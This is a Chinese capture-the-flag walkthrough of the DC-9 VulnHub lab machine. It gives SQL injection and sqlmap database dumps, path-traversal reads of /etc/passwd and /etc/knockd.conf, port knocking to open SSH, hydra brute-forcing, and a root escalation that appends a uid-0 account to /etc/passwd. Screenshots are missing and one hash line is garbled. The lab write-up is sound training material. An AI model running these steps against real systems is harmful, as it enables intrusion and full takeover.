天天看點

DC-9--vulnhub靶場

靶場擷取位址

https://www.vulnhub.com/entry/dc-9,412/
           

網絡模式:NAT

攻擊機:kali

目錄

      • 1、主機發現
      • 2、存在檔案包含
      • 3、knockd敲門服務
      • 4、提權

錄)

1、主機發現

arp-scan -l
           
DC-9--vulnhub靶場
nmap -p- 192.168.194.170
           
DC-9--vulnhub靶場

80端口開放,22端口被過濾,後面會用到

DC-9--vulnhub靶場

可能會有SQL注入,使用1’ or 1=1#顯示全部,是以存在

使用burpsuites抓包儲存為檔案post.txt,

DC-9--vulnhub靶場

sqlmap爆破

sqlmap -r /home/kali/Desktop/post.txt --dbs
           

使用-r參數

DC-9--vulnhub靶場
sqlmap -r /home/kali/Desktop/post.txt -D users --tables
           
sqlmap -r /home/kali/Desktop/post.txt -D users -T UserDetails  --columns
           
sqlmap -r /home/kali/Desktop/post.txt -D users -T UserDetails  -C username,password --dump
           
DC-9--vulnhub靶場

還有另一個staff庫

DC-9--vulnhub靶場

使用admin 和 transorbital1登入

DC-9--vulnhub靶場

發現

File does not exist

2、存在檔案包含

試下常見參數得到為file

http://192.168.194.170/manage.php?file=…/…/…/…/…/…/etc/passwd

DC-9--vulnhub靶場

3、knockd敲門服務

http://192.168.194.170/manage.php?file=…/…/…/…/…/…/etc/knockd.conf

通過看源檔案更清晰

DC-9--vulnhub靶場

敲門 Knockd,敲擊方法:nc、nmap,參考

此時22端口開放

使用之前爆破的使用者密碼進行hydra爆破

hydra -L dc9pass -P dc9pass2 192.168.194.170 ssh -t 20
           
DC-9--vulnhub靶場

對這賬号都嘗試進行登陸,隻有janitor的家目錄存在一個名為.secrets-for-putin的檔案夾,并且在其中又得到一些密碼

DC-9--vulnhub靶場

4、提權

DC-9--vulnhub靶場

參考

DC-9--vulnhub靶場
#python test.py read append 讀取内容追加内容的意思
openssl passwd  -1 -salt  admin 123456
           
1 1 1admin$LClYcRe.ee8dQwgrFc5nz.
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
           
cd /opt/devstuff/dist/test
           
sudo ./test /tmp/passwd  /etc/passwd
           
DC-9--vulnhub靶場

繼續閱讀